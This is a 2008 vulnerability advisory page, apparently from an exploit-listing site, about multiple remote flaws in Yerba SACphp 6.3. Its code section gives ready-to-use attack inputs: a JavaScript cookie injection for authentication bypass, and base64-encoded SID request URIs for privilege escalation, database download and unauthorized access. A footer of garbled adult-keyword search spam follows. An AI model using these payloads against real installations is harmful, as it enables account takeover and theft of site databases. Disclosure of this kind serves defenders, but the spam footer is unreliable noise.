about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Yerba SACphp 6.3 Multliple Remote Vulnerabilities


Title Yerba SACphp 6.3 Multliple Remote Vulnerabilities
Published 2008-10-07-12:00AM
Updated 2008-10-07-08:58PM
Class Unknown
CVE  
Remote  Yes
Local  No
Credit  StAkeR
Vulnerable  Yerba SACphp 6.3
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URIs and JavaScript are available: Authentication bypass:
javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="Privilege-escalation
http://www.example.com/index.php?SID=[path (base64 encoded)]Database Download
http://www.example.com/index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==Unauthorized access:
http://www.example.com/index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 22:33:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
celebrityx ndmp cardmia.it www.Sexysc t72t rahaidajoo t72t chathurika special_re Sexvedos www.hot sa phpnuke in adult tuba Www.xxx.ru Nanci agra candylist. indian sex sexy aunty Gay sex fh phBb cartoonsex cheb khouz Realessex CMS is Fre news for c Batman CMS is Fre youporn images sex McAfee Vir t72t t451t Sexvedos Invision P xemphimsec mambo remo IPB 2.2.0 Artis indi 503 Sexarbac fastpublis t382t ....com/r google www.sexipi 6.00LS free tamil t111t Www.sex18 Topless as